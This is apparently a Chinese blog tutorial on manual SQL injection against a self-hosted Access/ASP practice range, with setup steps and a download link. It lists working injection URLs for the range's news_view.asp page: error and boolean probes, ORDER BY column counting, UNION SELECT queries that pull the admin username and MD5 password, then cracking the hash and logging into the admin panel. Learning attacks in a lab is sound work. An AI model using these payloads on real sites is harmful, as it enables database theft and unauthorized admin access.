Access手工注入靶场(附环境搭建教程)

1、百度网盘链接:链接:https://pan.baidu.com/s/1Rl-YsRyD6UsvheTfYmHEkw     提取码:sfln

2、将压缩包解压到网站根目录(wwwroot)下

3、iis网站绑定IP

4、访问IP即可进入靶场

5、判断网页是否存在注入点

news_view.asp?id=10' 页面报错

news_view.asp?id=10 and 1=1 页面显示正确

news_view.asp?id=10 and 1=2 页面报错

6、使用 order by 判断字段列数

news_view.asp?id=10 order by 1 页面正确

news_view.asp?id=10 order by 7 页面显示正确

news_view.asp?id=10 order by 8 页面报错

由此可得,字段列数为7列

7、尝试寻找回显点

注意:access与MySQL的查询语法不同

access的查询语法是select * from 表名

表名只能靠字节猜测 常见的表名或字段名:admin、users、username、user_name admin_user、administrator

尝试表名为users 页面报错 说明不存在users表

news_view.asp?id=10 union select 1,2,3,4,5,6,7 from users

尝试表名为administrator时 页面正常 出现回显点

news_view.asp?id=10 union select 1,2,3,4,5,6,7 from admininistrator

8、尝试查询后台登录用户的用户名和密码

表的字段名只能靠猜

在回显点的位置查询我们要查询的语句 

news_view.asp?id=10 union select 1,user_name,3,4,5,6,7 from administrator

尝试用户名的字段=user_name时 页面显示正常 返回了用户名为admin

尝试密码的字段为password时 页面正常显示 并返回了一串加密后的密码

/news_view.asp?id=10 union select 1,user_name,password,4,5,6,7 from administrator

9、使用在线网站解密加密后的MD5密码

在线解密网站:md5在线解密破解,md5解密加密

解密后的密码为admin

10、查找网站的后台登录地址 并登录后台

使用御剑进行目录扫描 可以看到有一个index.asp

在网站访问index.asp

http://172.16.1.136/admin/index.asp

可以看到是后台登录管理系统

用户名 admin        密码 admin 可以登录成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值